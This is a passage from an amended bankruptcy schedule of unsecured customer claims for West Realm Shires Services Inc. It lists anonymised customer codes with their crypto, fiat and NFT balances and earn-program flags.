| 07410563 | | BAT[4.09316852], BRZ[5], DOGE[7.00057537], GRT[2], LINK[1.02339254], SHIB[16], TRX[11], USD[2582.55], USDT[0.02254902] | Yes | |
| 07410566 | | GRT[3.52124316], SOL[0] | | |
| 07410567 | | USD[0.41], USDT[0] | Yes | |
| 07410573 | | SOL[0], YFI[0] | | |
| 07410574 | | BRZ[1], DOGE[2], USD[0.00] | | |
| 07410580 | | BRZ[1], SOL[0] | | |
| 07410587 | | BCH[.03282829], TRX[1], USD[0.00] | | |
| 07410589 | | USD[3.69] | | |
| 07410593 | | BRZ[2], CUSDT[6], DOGE[3.00000001], GRT[1.00367791], TRX[2], USD[0.00], USDT[0.00000001] | | |
| 07410599 | | CUSDT[9], DOGE[358.70261217], SHIB[3], TRX[1], USD[1.69], USDT[0.68560835] | | |
| 07410600 | | BTC[.00009329] | | |
| 07410606 | | CUSDT[2], DOGE[944.20791624], USD[0.00] | | |
| 07410607 | | BRZ[1], BTC[0], CUSDT[1], DOGE[1], ETH[0], GRT[1.00498957], LTC[0], TRX[2], USD[39.04], USDT[1.11056299] | Yes | |
| 07410608 | | BCH[.000655], BTC[.00000688], DOGE[.035], USD[0.00] | | |
| 07410612 | | BRZ[1], BTC[.00020322], DOGE[474.7047676], ETH[.00636243], ETHW[.00636243], LINK[.19146451], LTC[.05518922], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07410614 | | CUSDT[1], USD[0.00] | | |
| 07410619 | | BRZ[1], CUSDT[1], DOGE[1], ETH[0], GRT[1], TRX[5], USD[0.00] | | |
| 07410626 | | BTC[.06403485], ETH[.000576], ETHW[.000576], LINK[.0908], USD[0.04] | | |
| 07410636 | | USD[0.00] | | |
| 07410638 | | USD[0.00] | | |
| 07410645 | | BTC[.00029746], SUSHI[99.6] | Yes | |
| 07410648 | | BRZ[1], BTC[.00089875], CUSDT[2], DOGE[489.79649243], ETH[.0130811], ETHW[.01291694], SHIB[712983.72137097], TRX[1], USD[0.00] | Yes | |
| 07410658 | | USD[0.00] | | |
| 07410660 | | ETH[0], SOL[0], USD[0.00] | | |
| 07410662 | | BTC[0], ETH[.00000001], ETHW[0], SOL[0], USD[0.04], USDT[0.00000001] | | |
| 07410673 | | USD[0.10], USDT[0] | | |
| 07410674 | | USDT[0] | | |
| 07410681 | | BRZ[1], CUSDT[4], DOGE[476.23424639], ETHW[.29829018], SHIB[3], SUSHI[.68519939], TRX[2], USD[37.24] | | |
| 07410688 | | CUSDT[3], DOGE[2111.96862016], GRT[1], SOL[181.87330541], TRX[2], USD[0.00] | Yes | |
| 07410695 | | USD[0.00], USDT[0.00000036] | | |
| 07410697 | | USD[0.00] | | |
| 07410698 | | BRZ[2], CUSDT[4], DOGE[1202.02464116], LINK[25.10946024], TRX[9413.01688108], USD[0.00] | Yes | |
| 07410701 | | BAT[2.35434784], BRZ[2], CUSDT[13], DOGE[2], KSHIB[1054.19997844], MATIC[2.84929107], SHIB[4], TRX[1], USD[0.00], USDT[1.06602724] | Yes | |
| 07410704 | | ETH[.00004947], ETHW[.00004947], USD[0.01] | | |
| 07410707 | | DOGE[.00000269], TRX[.00002395], USD[0.11], USDT[0.00000001] | | |
| 07410712 | | BTC[.00099808], DOGE[1], USD[19.87] | | |
| 07410714 | | NFT [522419760812352980/Good Boy #2159][1] | | |
| 07410721 | | DOGE[629.1348], SUSHI[.4962], UNI[2.497625], USD[0.00], USDT[86.08849513] | | |
| 07410722 | | AUD[0.00], BRZ[0], BTC[0], CAD[0.00], CUSDT[17], DOGE[0], ETH[0], GBP[0.00], SGD[0.00], SOL[0], TRX[2], USD[0.00] | | |
| 07410727 | | SOL[0], USDT[0.00000022] | | |
| 07410732 | | LTC[.009016], SOL[.64839], TRX[.000004] | | |
| 07410736 | | ETH[0], LTC[0], SOL[0], SUSHI[.482], TRX[.772], USD[0.00] | | |
| 07410741 | | BTC[.00054128], USD[0.03] | | |
| 07410743 | | BTC[.0354] | | |
| 07410744 | | BAT[2], BF_POINT[200], BRZ[1], BTC[0.00005028], ETHW[0], FTX_EQUITY[0], NFT [290941857901204256/Peace of Heart][1], NFT [302729043919352652/FTX  World][1], NFT [304124689451888013/The Hill by FTX][1], NFT [310461401642676636/MagicEden Vaults][1], NFT [310975607882161980/Unity #303][1], NFT [312224145765125362/JoeSirc logo remix 1][1], NFT [315491133295219886/MagicEden Vaults][1], NFT [317807473276620134/Warriors 75th Anniversary Icon Edition Diamond #5][1], NFT [320362744262160214/Nothing #34][1], NFT [322699484516556894/GrowthStudies][1], NFT [323357175017623855/Coachella x FTX Weekend 2 #6005][1], NFT [336518394064649915/Serum Surfers X Crypto Bahamas #2][1], NFT [336718422095394648/DEMO - The Hill by FTX #2][1], NFT [337078673617428039/Home Run Derby X - London #14][1], NFT [342671453073422130/Fluid FTX][1], NFT [346178180772576770/0.Predawn Navy][1], NFT [351900348258000604/SSFDKDF-test][1], NFT [358882629683320766/Edition First #2][1], NFT [364368039925386754/The 2974 Collection #0713][1], NFT [366862509363246478/APEFUEL by Almond Breeze #29][1], NFT [369202842667802438/Founding Frens Lawyer #684][1], NFT [371960473558751938/Series 1: Capitals #19][1], NFT [381090492774195937/Sound Test 001 Series #3][1], NFT [386413510810944356/Entrance Voucher][1], NFT [389888584483437637/Silverstone Ticket Stub #388][1], NFT [390117500178383229/01.Predawn - Ukraine #399][1], NFT [391872189699042228/Good Boy #10][1], NFT [402313772340456302/MagicEden Vaults][1], NFT [403178879392571819/Barcelona Ticket Stub #63][1], NFT [419578751650113679/FTX Crypto Cup 2022 Key #3][1], NFT [423017223448599259/Together we build the future][1], NFT [423068290538156234/TOKEN2049 - we are here!][1], NFT [426282312559770660/hoodie #4][1], NFT [427748792507691029/CO2 FX #55][1], NFT [430687718541331258/01.Predawn - Ukraine #145][1], NFT [431422358504919564/Imola Ticket Stub #305][1], NFT [434503046338729217/Women in Music 33 #2][1], NFT [437940553778265729/Humpty Dumpty #10][1], NFT [440207506017479356/SOLdreams = FTX Logo Remix #1][1], NFT [444025344058207407/MagicEden Vaults][1], NFT [445154341386974553/Resilience  #3][1], NFT [445622297502200921/ftx hot fud fold][1], NFT [463581606204143041/Mystery Egg #0036][1], NFT [476327392617731928/FTX Logo Remix Contest][1], NFT [476784083022256675/DEMO - The Hill by FTX][1], NFT [481877044994327584/LA Hacker House 2022 #3][1], NFT [482986181875533010/Microphone][1], NFT [515006165839446471/FTX x Young Jotaro][1], NFT [518457288696105669/SOLdreams = FTX Logo Remix #2][1], NFT [519063826264407666/00.Predawn Navy][1], NFT [523865756501323729/Monocle #41][1], NFT [528246976266659334/A Prestu 2022 #5][1], NFT [537517365533107599/Montreal Ticket Stub #144][1], NFT [540699122807759058/CORE 22][1], NFT [542962624531729982/MagicEden Vaults][1], NFT [552166077318353965/Shaq's Fun House Commemorative Ticket #6][1], NFT [552176830101645026/Degen Poet x FTX][1], NFT [567854050745522503/Call It #24][1], NFT [567961607814916223/Blockworld instax][1], NFT [568100507064864590/Fortuo Distinctus][1], NFT [570773824376772681/JoeSirc Logo Remix 2][1], SHIB[15], SOL[0.00000001], USD[0.00], USDT[2.02304499] | Yes | |
| 07410748 | | USD[0.00] | Yes | |
| 07410749 | | CUSDT[3], DOGE[1], USD[0.01] | | |
| 07410757 | | BTC[0], SOL[0], USD[21.11] | | |
| 07410760 | Contingent, Unliquidated | BTC[.02821597], CUSDT[2], DOGE[5215.64897049], ETH[.45529952], ETHW[.45517117], NFT [427563217530655997/Love Is The Force][1], SHIB[4462618.85300911], SOL[3.19837296], TRX[8.00087675], USD[204.34] | Yes | |
| 07410761 | | CUSDT[2], DOGE[0], KSHIB[11.35054952], PAXG[0], SHIB[2], SUSHI[0], TRX[0], USD[0.00] | Yes | |
| 07410763 | | BTC[.00639068], ETH[.00002475], ETHW[2.70927704], LINK[199.31290525], MATIC[2362.03379608], SHIB[6], SOL[16.1288889], USD[0.00] | Yes | |
| 07410766 | | CUSDT[3], DOGE[3], USD[0.01] | | |
| 07410769 | | BRZ[2], CUSDT[2], ETH[0], GRT[0], USD[0.00] | Yes | |
| 07410779 | | USD[0.01] | | |
| 07410788 | | DOGE[2], GRT[3.02453182], LINK[.05921603], USD[0.10] | | |
| 07410790 | | NFT [478939146580705319/Coachella x FTX Weekend 2 #3315][1], SOL[0] | | |
| 07410792 | | DAI[.06541001], ETHW[.005], SOL[.008], USD[1.22] | | |
| 07410794 | | SOL[0], USD[0.00], USDT[0] | | |
| 07410795 | | BTC[0.00007777], DOGE[.485], SOL[0.00661710], SUSHI[.0996], TRX[.6034], USD[0.00], USDT[0.00000001] | | |
| 07410797 | | BTC[0], ETH[.0000112], ETHW[.0000112], USD[0.29] | | |
| 07410802 | | CUSDT[1], USD[0.01] | | |
| 07410804 | | BTC[.00284051], CUSDT[2], SHIB[2], TRX[2], USD[0.00] | Yes | |

West Realm Shires Services Inc.

Case 22-11068-JTD   Doc 1752   Amended Schedule F for Nonpriority Unsecured Customer Claims   Filed 06/27/23   Page 1192 of 1316

22-11071 (JTD)

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07410806 | | BTC[0], CUSDT[9], DOGE[4.02183096], TRX[3], USD[0.00], USDT[0] | Yes | |
| 07410808 | | GRT[0], SOL[0], USD[3.91], USDT[0.35412374] | | |
| 07410809 | | DOGE[11489.075], GRT[3472.6978], SOL[1378.0700795], SUSHI[452.070125], USD[7699.65] | | |
| 07410822 | | DOGE[1], USD[0.00] | | |
| 07410827 | | CUSDT[1], TRX[1], USD[0.01], USDT[1] | | |
| 07410836 | | USD[0.00], USDT[0] | | |
| 07410838 | | BAT[6.55916102], CAD[0.00], CUSDT[57.86143553], DOGE[1], TRX[3], USD[0.01] | Yes | |
| 07410843 | | CUSDT[3], DOGE[1], TRX[1], USD[6.97] | | |
| 07410844 | | ETH[.00010263], ETHW[58.01116807], USD[0.00] | | |
| 07410846 | | BTC[0], DAI[0], ETH[0.00067000], ETHW[0.00067000], SUSHI[0.01832871], USD[2.36], USDT[0] | | |
| 07410852 | | NFT (392196460671872389/Saudi Arabia Ticket Stub #1644)[1], NFT (482771211894723666/2974 Floyd Norman - OKC 6-0168)[1], USD[0.00] | | |
| 07410858 | | BAT[1], BF_POINT[100], DOGE[6.00038359], USD[0.00] | Yes | |
| 07410860 | | BTC[.00908762], ETH[.000168], ETHW[.000168], TRX[.64], USD[1000.00] | | |
| 07410869 | | BAT[0], BTC[0], CUSDT[0.54600477], ETH[0], GRT[0], LTC[0], TRX[0.00004796], USD[7.31], USDT[0], YFI[0] | | |
| 07410875 | | LTC[.009], USD[0.15] | | |
| 07410876 | | USD[0.00] | | |
| 07410880 | | BRZ[2], CUSDT[1], DOGE[17154.51434605], NFT (477895459027342542/Entrance Voucher #3210)[1], TRX[2], USD[0.00] | | |
| 07410886 | | DOGE[2], USD[16.75] | | |
| 07410887 | | BRZ[1], CUSDT[8], DOGE[712.84852193], ETH[.09341596], ETHW[.09237147], LTC[.0766217], SOL[3.97611544], TRX[687.26554169], USD[0.00] | Yes | |
| 07410893 | | USD[2000.00] | | |
| 07410900 | | GRT[0], NFT (463314137270331984/Coachella x FTX Weekend 2 #4088)[1], NFT (534887118068997103/Entrance Voucher #2655)[1], SHIB[62.21031057], USD[0.00] | Yes | |
| 07410904 | | BTC[0], DOGE[0], ETH[0], KSHIB[0], SHIB[4852.93747284], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07410912 | | BTC[0], ETH[0], MKR[0], USD[0.00], USDT[0] | | |
| 07410918 | | DOGE[1], USD[0.00] | Yes | |
| 07410919 | | BAT[95.65919536], BRZ[294.17571495], BTC[.00598], CUSDT[10835.43151568], DOGE[394.4553352], ETH[.09158801], ETHW[.09053953], GRT[231.03698756], MATIC[113.96830981], NEAR[35.76701863], SOL[2.01448865], SUSHI[6.14235457], TRX[5087.56020006], USD[33.03], USDT[24.28535688] | Yes | |
| 07410926 | | BTC[.01127237], ETH[.001], ETHW[.001], SUSHI[7.1.2283], USD[16.09] | | |
| 07410928 | | BF_POINT[600], BRZ[4], CUSDT[10], ETHW[.20402651], TRX[6], USD[0.01] | Yes | |
| 07410932 | | BRZ[1], CUSDT[3], DOGE[1], TRX[2], USD[0.00] | | |
| 07410936 | | DOGE[1], USD[0.00] | Yes | |
| 07410937 | | USD[1.61] | | |
| 07410941 | | BAT[0], BTC[0], DOGE[0], USD[0.00], USDT[0] | | |
| 07410946 | | BTC[.26017343], CUSDT[1], ETH[1.70002496], ETHW[1.70002496], TRX[1], USD[0.00], USDT[189.15037500] | | |
| 07410957 | | BTC[0.00001210], ETH[.0004], ETHW[.0004], USDT[1.4229048] | | |
| 07410959 | | BTC[0.00002114], ETH[.00000001], UNI[.00935], USD[2.49], USDT[0] | | |
| 07410966 | | BRZ[4], CUSDT[4], DOGE[2], TRX[6], USD[0.00] | Yes | |
| 07410969 | | BAT[.134], DOGE[.101], LINK[.06184], SOL[.08182], SUSHI[.388], TRX[.3358], USD[1.54], USDT[.002835] | | |
| 07410973 | | BRZ[1], BTC[.00015597], CUSDT[19], DOGE[1369.74861767], ETH[.00867429], ETHW[.00867429], MATIC[73.21210527], SHIB[2159048.05541392], SOL[3.31997587], TRX[219.25713021], USD[0.00] | | |
| 07410978 | | MATIC[9.79], SUSHI[.448], TRX[314.685], USD[2.25] | | |
| 07410979 | | CUSDT[1], DOGE[2925.05362592], USD[0.00] | | |
| 07410980 | | BCH[.00009849], USD[0.00], USDT[0] | | |
| 07410981 | | AAVE[0], DOGE[1], USD[0.00] | Yes | |
| 07410983 | | BRZ[1], BTC[0], DOGE[0], ETH[0], ETHW[6.94834350], LINK[0], SOL[22.29037575], TRX[2], USD[102.12] | | |
| 07410985 | | BRZ[2], CUSDT[1], USD[0.00] | | |
| 07410989 | | AVAX[2.36250532], CUSDT[22], DOGE[14.24666687], ETHW[.07609687], LINK[5.21632048], MATIC[66.77095421], MKR[0], SHIB[109213.89127769], TRX[4], UNI[6.03798804], USD[0.00] | Yes | |
| 07410990 | | BTC[0], USD[0.98], USDT[0] | | |
| 07410991 | | USDT[1.563698] | | |
| 07410993 | | BAT[0], BTC[0.00000001], DOGE[0], ETH[0], SOL[0.00000001], TRX[0], USD[0.66], USDT[0.00000001] | | |
| 07410998 | | DOGE[.00997154], USD[0.01], USDT[0.00064690] | | |
| 07411000 | | BAT[2.82728263], CUSDT[207.73915712], TRX[387.29697494], USD[2.21] | Yes | |
| 07411001 | | BAT[.80759782], ETH[.237], ETHW[.237], NFT (457615589537689048/Entrance Voucher #3088)[1], USD[1.41] | | |
| 07411002 | | ETH[0.55396813], ETHW[.197], NFT (338788874326615010/Romeo #1229)[1], NFT (431149698795365147/FTX - Off The Grid Miami #7530)[1], SOL[16.74749], USD[0.24] | | |
| 07411004 | | BTC[0], ETH[0], SOL[0.00899168], USD[0.00], USDT[0.00001217] | | |
| 07411012 | | CUSDT[7], DOGE[.40787164], ETH[.00042161], ETHW[.00042161], TRX[2], USD[0.46] | | |
| 07411015 | | BTC[0], ETH[0], SOL[0], SUSHI[.00000001], USD[0.00] | | |
| 07411018 | | DOGE[.24745686], ETH[0], SUSHI[.06477091], USD[0.00], USDT[0] | | |
| 07411019 | Contingent, Disputed | ETH[0], NFT (310427966342354155/Miami Ticket Stub #528)[1], NFT (348583850060221915/Solarian Laser Eyes)[1], NFT (358290373851794686/FTX - Off The Grid Miami #3909)[1], SOL[0], SUSHI[.00000001], USD[0.18] | | |
| 07411022 | | ETH[0], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07411024 | | BTC[0], SOL[0], TRX[0], USD[0.00] | | |
| 07411025 | | BTC[.13273479], DOGE[3], ETH[2.79900685], ETHW[2.79900685], SOL[10.72283779], TRX[199.64930392] | | |
| 07411030 | | TRX[1], USD[0.00] | Yes | |
| 07411032 | | CUSDT[3], DOGE[0], USD[0.00] | Yes | |
| 07411035 | | BAT[0], ETH[0], USD[0.01] | Yes | |
| 07411042 | | BTC[.04010083], CUSDT[2], DOGE[6], TRX[5], USD[1.88], USDT[1] | | |
| 07411055 | | SOL[0], USD[0.00] | | |
| 07411057 | | BTC[0.00002536], NFT (327242115455813901/Abstract Labs Standard #6184)[1], NFT (527188520321205312/BilliBox #380)[1], SOL[0], USD[0.06] | | |
| 07411058 | | USD[0.00] | | |
| 07411064 | | TRX[2], USD[0.01] | | |
| 07411067 | | USD[0.00] | | |
| 07411072 | | BRZ[31.2059276], BTC[.0006421], CUSDT[187.10515351], DOGE[576.91315316], ETH[.00039025], ETHW[.00039025], GRT[9.12587446], KSHIB[1264.4634331], LINK[2.12418065], LTC[.18292972], MATIC[33.59855948], SHIB[3019019.36799549], SUSHI[9.19764033], TRX[44.87723795], USD[0.06] | | |
| 07411075 | | BF_POINT[300], DOGE[1], ETHW[1.04064535], SHIB[2], TRX[1], USD[0.00] | Yes | |
| 07411078 | | SOL[0], USD[0.00], USDT[0] | | |
| 07411083 | | BRZ[1], BTC[.00679987], CUSDT[11], DOGE[15355.80745127], GRT[1], KSHIB[376.56643793], SHIB[1818977.8625363], USD[0.00] | | |
| 07411084 | | BRZ[1], BTC[0], CUSDT[9], DOGE[6], GRT[2], TRX[3], USD[0.00], USDT[0.00020177] | | |
| 07411086 | | BRZ[1], CUSDT[4], DOGE[9639.86515901], ETH[.08251406], ETHW[.08251406], GRT[1], SUSHI[3.23398201], TRX[742.88731384], USD[0.00] | | |
| 07411095 | | BTC[0], SOL[0], USD[0.00] | | |
| 07411096 | | SOL[92.86674414] | | |
| 07411098 | | BTC[0], SOL[0], USD[0.01], USDT[0.00000574] | | |
| 07411108 | | DOGE[57.9] | | |
| 07411117 | | BRZ[1], BTC[.00721202], CUSDT[3], DOGE[630.20800185], ETH[.06031657], ETHW[.06031657], LTC[.24155751], TRX[1146.67264264], USD[0.00], USDT[1] | | |
| 07411119 | | BTC[.00003202], ETH[.000025], ETHW[.000025], LINK[.0163], SUSHI[.45], TRX[.403003], USD[4.80], USDT[.0045077] | | |
| 07411120 | | CUSDT[1], DOGE[1.48405241], USD[0.01] | | |
| 07411123 | | BTC[.02309919], LINK[.02735], MATIC[370], SOL[.00068], UNI[.02848], USD[0.62], USDT[0.00001861] | | |
| 07411126 | | BRZ[2], BTC[.00387485], CUSDT[6], DOGE[230.813335], GRT[1], KSHIB[1803.93955142], LINK[1.27795669], LTC[1.13970547], MKR[.01810326], NFT (436222278599929087/Man on the Moon)[1], NFT (463104480014500587/1/1 Pieces)[1], SOL[1.52470258], SUSHI[2.7817459], TRX[4], USD[0.47], USDT[1.08403875] | Yes | |
| 07411129 | | BAT[1], DOGE[1], MATIC[.05991275], SHIB[1], TRX[1], USD[0.00], USDT[2312.12378467] | Yes | |
| 07411132 | | BTC[0.00003400], ETH[0.00056197], ETHW[0.00056197], NFT (344945892526394397/Reflection '13 #80)[1], NFT (427665277447683490/The 2974 Collection #1667)[1], SOL[0], USD[0.00], USDT[0] | | |
| 07411135 | | BAT[1.0165555], BRZ[2], CUSDT[11], DOGE[354.92866001], SHIB[1498100.54928189], TRX[803.13074065], USD[0.00], USDT[1.08862218] | Yes | |
| 07411136 | | ETH[1.48851], ETHW[1.48851], SOL[0], TRX[0], USD[6.75] | | |
| 07411137 | | USD[0.08], USDT[0] | | |
| 07411140 | | SOL[0] | | |
| 07411142 | | BTC[0], CUSDT[3], ETH[.01682213], ETHW[.01682213], USD[0.00] | | |
| 07411144 | | SOL[.039], USD[0.01], USDT[0] | | |
| 07411145 | | BTC[.00025581], SOL[62.7606] | | |
| 07411148 | | USD[0.23] | | |
| 07411151 | | BRZ[1], GRT[1], SOL[215.61843154], USD[0.00] | | |
| 07411155 | | BTC[0], SOL[0], USD[0.00], USDT[0] | | |
| 07411166 | | USD[15.90] | | |
| 07411167 | | BRZ[1], CUSDT[1], DOGE[2], USD[0.00] | Yes | |
| 07411169 | | DOGE[1.00000904], SHIB[1], USD[0.00] | | |
| 07411170 | | AAVE[.00000001], BTC[0], ETH[.00000001], LINK[.00000001], USD[0.00] | | |
| 07411174 | | BTC[0], DOGE[4], ETH[0], LINK[0], SUSHI[0], USD[0.11], USDT[0.00001364] | | |
| 07411175 | | CUSDT[2], DOGE[1311.30759765], USD[0.00] | | |
| 07411185 | | BAT[4.18409077], BRZ[4], CUSDT[1], DOGE[7.00040455], GRT[5.09272643], MATIC[4453.35222186], NEAR[974.58435133], SHIB[1], SUSHI[113.59902316], TRX[7], USD[0.00], USDT[141.57317383] | Yes | |
| 07411187 | | DOGE[0], USD[0.00] | | |
| 07411193 | | BTC[0], USD[0.00] | Yes | |
| 07411196 | | BTC[.00019779], TRX[1], USD[0.00] | | |
| 07411197 | | NFT (542251559815047390/FTX - Off The Grid Miami #2952)[1] | | |
| 07411198 | | SOL[26.56698687], TRX[.604], USD[2.47] | | |
| 07411206 | | USD[0.00] | | |
| 07411208 | | BRZ[1], BTC[.01979548], CUSDT[1], USD[2000.00] | | |
| 07411211 | | BTC[.000034], ETH[.000559], ETHW[.000559], LINK[.0821], UNI[.0736], USD[0.55], YFI[.00096] | | |
| 07411212 | | ETH[.50468556], ETHW[.7668556], KSHIB[49.95], SHIB[852225.9252061], USD[152.82] | | |
| 07411215 | | BAT[2.06710321], BRZ[3], CUSDT[10], DOGE[1], ETH[0], ETHW[0], GRT[1], TRX[4], USD[0.12], USDT[0.00000689] | Yes | |
| 07411216 | | BRZ[.22241051], BTC[.0000414], CUSDT[331.62664582], TRX[2], USD[4.20], USDT[.00068201] | Yes | |
| 07411221 | | BAT[0], GRT[0], TRX[389.08081100], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07411222 | | BTC[0], ETH[0], FTX_EQUITY[0], NFT (317306837269476507/Microphone #8)[1], NFT (483670735910501493/FTX - Off The Grid Miami #3974)[1], SOL[2.74539671], USD[1.20] | Yes | |
| 07411228 | | BTC[.00000005], ETH[0], SOL[.18], USD[1.27] | | |
| 07411230 | | CUSDT[1], DOGE[600.71793001], USD[0.00] | | |
| 07411234 | | BTC[0], ETH[0], LTC[0], SOL[0] | | |
| 07411237 | | BAT[119.45607663], BCH[0], BRZ[7.75867934], BTC[0.00005279], CUSDT[381.14317178], DAI[0], DOGE[24.22285789], ETH[0], ETHW[0], GRT[215.55071055], LINK[53.69678695], PAXG[0], SHIB[46], SOL[11.30384473], SUSHI[17.91598889], TRX[138.39566426], UNI[0], USD[0.00], USDT[0.00001745], YFI[0] | Yes | |
| 07411238 | | BRZ[2], DOGE[2], ETH[.10921175], ETHW[.10921175], GRT[1], TRX[1], USD[0.00], USDT[1] | | |
| 07411240 | | BRZ[1], CUSDT[10], SHIB[1], USD[0.00], USDT[0] | Yes | |
| 07411241 | | DOGE[1], ETH[.09209576], ETHW[.09209576], TRX[1], USD[10.00] | | |
| 07411244 | | USD[0.11] | | |
| 07411253 | | USD[2.87] | | |
| 07411254 | | SOL[.00000001], USD[0.09] | | |
| 07411262 | | BTC[0.00023275], ETH[0], USD[0.00], USDT[1.25775] | | |
| 07411263 | | BTC[0], ETH[0], MATIC[0], SOL[0], UNI[0], USD[0.00], USDT[0] | | |
| 07411264 | | SOL[.071], USD[0.05] | | |
| 07411269 | | BTC[0], CUSDT[1], DOGE[1], USD[0.00] | | |
| 07411280 | | DOGE[0], TRX[.173932], USD[0.00], USDT[0.00003672] | | |
| 07411282 | | CUSDT[2], DOGE[2676.454842], TRX[4], USD[0.00], USDT[0] | | |
| 07411283 | | NFT (417785735944171737/Coachella x FTX Weekend 1 #30763)[1] | | |
| 07411287 | | UNI[0], USD[0.00] | | |
| 07411288 | | CUSDT[1], USD[0.00] | | |
| 07411290 | | BTC[.00267503], SOL[7.968], USDT[0.00035964] | | |
| 07411294 | | BCH[0], BTC[0], ETH[0], LINK[0], SOL[0], USD[0.00], USDT[0.00000027] | | |
| 07411296 | | DOGE[2], SOL[11.47714251], TRX[1], USD[0.00] | | |
| 07411299 | | BTC[0], ETH[0], SOL[0.60826849] | | |
| 07411302 | | AUD[0.00], BTC[0], TRX[0], USD[36.07], USDT[0.00000001] | | |
| 07411308 | | BTC[0], USD[0.00] | | |
| 07411315 | | BTC[.00000048], DOGE[1], SHIB[1], USD[0.01] | Yes | |
| 07411318 | | BRZ[1], CUSDT[2], DOGE[1], TRX[3], USD[0.00] | | |
| 07411323 | | USD[0.00], USDT[0] | | |
| 07411324 | | USD[0.00] | | |
| 07411344 | | USD[9.43] | | |
| 07411353 | | ETH[0], USD[0.00] | | |
| 07411355 | | ETH[0], USD[1.66] | | |
| 07411361 | | SOL[.006251], SUSHI[.4915], USD[0.18] | | |
| 07411363 | | ETH[0], ETHW[0], USD[0.00] | Yes | |
| 07411371 | | ETHW[.770512], USD[8.76] | | |
| 07411373 | | BTC[0], DOGE[.00009959], ETH[0], ETHW[0], SHIB[0], SOL[0], USD[0.00], USDT[0.70000495] | | |
| 07411382 | | BTC[0], SOL[0], USDT[0.00000007] | | |
| 07411387 | | SOL[.0084], UNI[.0027], USD[0.00], USDT[0.00000001] | | |
| 07411393 | | BTC[0], SOL[0], USD[0.00], USDT[0.00000056] | Yes | |
| 07411395 | | CUSDT[1], DOGE[306.31766673], USD[0.00] | | |
| 07411399 | | BTC[.00036652], DAI[21.93334497], SHIB[7356832.57292170], TRX[12.14660044], USD[0.00], USDT[0.00042583] | Yes | |
| 07411403 | | USD[4.61] | | |
| 07411405 | | USD[0.01] | | |
| 07411421 | | BRZ[1], BTC[.0189338], CUSDT[1], DOGE[3], ETH[1.61385168], ETHW[1.61317385], GRT[2.02262922], SOL[8.73921948], TRX[2], USD[0.00], USDT[1.07776281] | Yes | |
| 07411427 | | BF_POINT[106400], USD[7676.01] | | |
| 07411431 | | ETH[.000189], ETHW[.000189], TRX[.000004] | | |
| 07411439 | | USD[0.01] | | |
| 07411440 | | DOGE[.6136], USD[1.80], USDT[0] | | |
| 07411441 | | DOGE[3.67314005], USD[0.00] | | |
| 07411443 | | BTC[0], DOGE[1], USD[0.00] | | |
| 07411444 | | DAI[0], DOGE[0], ETH[0.00000001], ETHW[0], GRT[0], NFT (410283903789508283/Sugar Head)[1], SHIB[0], SOL[0.00000001], SUSHI[0], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07411447 | | LTC[6.36199345] | | |
| 07411449 | | BTC[0], DOGE[0.37299244], USD[0.02] | | |
| 07411452 | | BTC[0], SOL[0], USD[0.23] | | |
| 07411453 | | USD[0.00] | | |
| 07411455 | | LINK[0], MATIC[0], SOL[0], USD[0.00] | | |
| 07411459 | | BTC[.00003706], ETH[0], ETHW[0.09600000], UNI[.0087], USD[5.54] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07411462 | | CUSDT[1], DOGE[1], USD[0.00] | | |
| 07411464 | | NFT (427118093757661919/7048)[1], SUSHI[.004], TRX[.000008], USD[0.17] | | |
| 07411470 | | BRZ[2], CUSDT[13], DOGE[1], USD[0.00] | | |
| 07411477 | | BAT[1.01653643], BRZ[4], BTC[.00580982], CUSDT[28], DOGE[103], SHIB[7], TRX[16.25808906], USD[387.21] | | |
| 07411487 | | BAT[31.41582845], BTC[.00208859], CUSDT[5], DOGE[2], LINK[1.60093294], SOL[.61069881], UNI[.95544626], USD[0.00] | | |
| 07411497 | | USD[0.00] | | |
| 07411498 | | BTC[0.02547784], ETH[.04822525], ETHW[.04822525], SHIB[7096100], TRX[.608], USD[0.32] | | |
| 07411503 | | AAVE[0], BTC[0], SGD[0.00604000], SUSHI[0.14450001], USD[0.77], USDT[0.00000009] | | |
| 07411510 | | ETH[.00008268], ETHW[.00008268], SOL[.48], USDT[.3596352] | | |
| 07411512 | | CUSDT[2], DOGE[48.82881052], USD[0.00] | | |
| 07411515 | | BTC[.00003939] | | |
| 07411518 | | BTC[5.638232] | | |
| 07411519 | | BAT[472.56636445], CUSDT[6], DOGE[1110.38852674], SOL[.00009475], TRX[1], USD[0.00], USDT[2.21646551] | Yes | |
| 07411520 | | BTC[0], DOGE[0], GBP[0.00], USD[0.00], USDT[0] | | |
| 07411525 | | DOGE[0], ETH[0], TRX[0.00028908], USD[0.00] | Yes | |
| 07411526 | | BTC[0.00402853], SOL[.62683265], USD[0.10] | | |
| 07411527 | | SOL[0] | | |
| 07411529 | | BTC[0], DOGE[.944], ETH[.0000114], ETHW[10.1208114], SHIB[100000], SOL[.35], USD[0.29] | | |
| 07411534 | | BTC[0], DOGE[0], ETH[0], TRX[0], USD[0.00], USDT[0] | | |
| 07411537 | | DOGE[3], TRX[.00001231], USD[0.00] | | |
| 07411539 | | BRZ[1], BTC[0], CUSDT[4], DOGE[0], TRX[1], USD[0.00] | Yes | |
| 07411542 | | BAT[1.00719439], BRZ[2], DOGE[2], TRX[2], USD[0.00], USDT[1.03736559] | | |
| 07411545 | | BTC[.0204406], DOGE[4.10159987], ETH[1.08906912], ETHW[1.08861179], SOL[17.27788392], USD[103.93] | Yes | |
| 07411546 | | BTC[0], DOGE[0], ETH[0], ETHW[0], GRT[0], LINK[0], MATIC[.00000001], SOL[0], USD[0.00], USDT[0] | | |
